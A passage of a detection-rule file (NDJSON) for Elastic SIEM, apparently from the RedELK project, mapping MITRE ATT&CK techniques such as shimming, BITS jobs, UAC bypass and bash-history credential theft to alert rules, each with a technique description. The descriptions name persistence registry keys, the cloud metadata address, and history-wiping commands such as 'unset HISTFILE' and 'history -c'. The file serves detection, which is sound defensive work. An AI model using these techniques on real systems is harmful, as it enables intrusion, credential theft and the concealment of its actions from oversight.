were created for Windows XP so that it will work with Windows 10. [1]\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n%WINDIR%\\AppPatch\\sysmain.sdb and\nhklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\nCustom databases are stored in:\n%WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\nhklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Access Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. [2] Shims can also be abused to establish persistence by continuously being invoked by affected programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1138","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1138] Application Shimming","query":"threat.technique.id: T1138","references":["https://attack.mitre.org/techniques/T1138","https://attack.mitre.org/techniques/T1546/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1138","name":"Application Shimming","id":"T1138"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1138","name":"Application Shimming","id":"T1138"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1123","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1123] Audio Capture","query":"threat.technique.id: T1123","references":["https://attack.mitre.org/techniques/T1123"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1123","name":"Audio Capture","id":"T1123"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.\nThis technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1119","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1119] Automated Collection","query":"threat.technique.id: T1119","references":["https://attack.mitre.org/techniques/T1119"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1119","name":"Automated Collection","id":"T1119"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. [1]\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1131","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1131] Authentication Package","query":"threat.technique.id: T1131","references":["https://attack.mitre.org/techniques/T1131","https://attack.mitre.org/techniques/T1547/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1131","name":"Authentication Package","id":"T1131"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1020","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1020] Automated Exfiltration","query":"threat.technique.id: T1020","references":["https://attack.mitre.org/techniques/T1020"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1020","name":"Automated Exfiltration","id":"T1020"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). [1] [2] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\nThe interface to create and manage BITS jobs is accessible through PowerShell [2] and the BITSAdmin tool. [3]\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. [4] [5] [6] BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). [7] [4]\nBITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1197","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1197] BITS Jobs","query":"threat.technique.id: T1197","references":["https://attack.mitre.org/techniques/T1197"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1197","name":"BITS Jobs","id":"T1197"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1197","name":"BITS Jobs","id":"T1197"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1139","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1139] Bash History","query":"threat.technique.id: T1139","references":["https://attack.mitre.org/techniques/T1139","https://attack.mitre.org/techniques/T1552/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1139","name":"Bash History","id":"T1139"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.[1] The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.[2] Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1009","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1009] Binary Padding","query":"threat.technique.id: T1009","references":["https://attack.mitre.org/techniques/T1009","https://attack.mitre.org/techniques/T1027/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1009","name":"Binary Padding","id":"T1009"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1217","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1217] Browser Bookmark Discovery","query":"threat.technique.id: T1217","references":["https://attack.mitre.org/techniques/T1217"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1217","name":"Browser Bookmark Discovery","id":"T1217"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. [2]\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1067","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1067] Bootkit","query":"threat.technique.id: T1067","references":["https://attack.mitre.org/techniques/T1067","https://attack.mitre.org/techniques/T1542/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1067","name":"Bootkit","id":"T1067"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. [1] [2]\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. [3] Once the extension is installed, it can browse to websites in the background, [4] [5] steal all information that a user enters into a browser (including credentials) [6] [7] and be used as an installer for a RAT for persistence.\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. [8] There have also been similar examples of extensions being used for command & control [9].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1176","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1176] Browser Extensions","query":"threat.technique.id: T1176","references":["https://attack.mitre.org/techniques/T1176"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1176","name":"Browser Extensions","id":"T1176"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1110","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1110] Brute Force","query":"threat.technique.id: T1110","references":["https://attack.mitre.org/techniques/T1110"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1110","name":"Brute Force","id":"T1110"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. [1]\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. [2] [3] An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[4]\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[5] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\neventvwr.exe can auto-elevate and execute a specified binary or script.[6][7]\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[8]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1088","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1088] Bypass User Account Control","query":"threat.technique.id: T1088","references":["https://attack.mitre.org/techniques/T1088","https://attack.mitre.org/techniques/T1548/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1088","name":"Bypass User Account Control","id":"T1088"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1088","name":"Bypass User Account Control","id":"T1088"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. [1] CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. [2] Similar to Regsvr32 / \"Squiblydoo\", CMSTP.exe may be abused to load and execute DLLs [3] and/or COM scriptlets (SCT) from remote servers. [4] [5] [6] This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\nCMSTP.exe can also be abused to Bypass User Access Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. [3] [5] [6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1191","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1191] CMSTP","query":"threat.technique.id: T1191","references":["https://attack.mitre.org/techniques/T1191","https://attack.mitre.org/techniques/T1218/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1191","name":"CMSTP","id":"T1191"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1191","name":"CMSTP","id":"T1191"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access [1] [2] or by administrators using the built-in assoc utility. [3] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nSystem file associations are listed under HKEY_CLASSES_ROOT.[extension], for example HKEY_CLASSES_ROOT.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT[handler]\\shell[action]\\command. For example: HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1042","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1042] Change Default File Association","query":"threat.technique.id: T1042","references":["https://attack.mitre.org/techniques/T1042","https://attack.mitre.org/techniques/T1546/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1042","name":"Change Default File Association","id":"T1042"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may collect data stored in the clipboard from users copying information within or between applications.\nIn Windows, Applications can access clipboard data by using the Windows API.[1] OSX provides a native command, pbpaste, to grab clipboard contents.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1115","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1115] Clipboard Data","query":"threat.technique.id: T1115","references":["https://attack.mitre.org/techniques/T1115"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1115","name":"Clipboard Data","id":"T1115"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.\nThese logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\nAdversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1146","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1146] Clear Command History","query":"threat.technique.id: T1146","references":["https://attack.mitre.org/techniques/T1146","https://attack.mitre.org/techniques/T1070/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1146","name":"Clear Command History","id":"T1146"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.[1] A cloud metadata API has been used in at least one high profile compromise.[2]\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.[3]\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1522","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1522] Cloud Instance Metadata API","query":"threat.technique.id: T1522","references":["https://attack.mitre.org/techniques/T1522","https://attack.mitre.org/techniques/T1552/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1522","name":"Cloud Instance Metadata API","id":"T1522"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[1]\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1538","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1538] Cloud Service Dashboard","query":"threat.technique.id: T1538","references":["https://attack.mitre.org/techniques/T1538"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1538","name":"Cloud Service Dashboard","id":"T1538"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1526","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1526] Cloud Service Discovery","query":"threat.technique.id: T1526","references":["https://attack.mitre.org/techniques/T1526"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1526","name":"Cloud Service Discovery","id":"T1526"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.\nThere are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript/JScript and Visual Basic.\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1059","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1059] Command-Line Interface","query":"threat.technique.id: T1059","references":["https://attack.mitre.org/techniques/T1059"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1059","name":"Command-Line Interface","id":"T1059"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create, acquire, or steal code signing materials to sign their 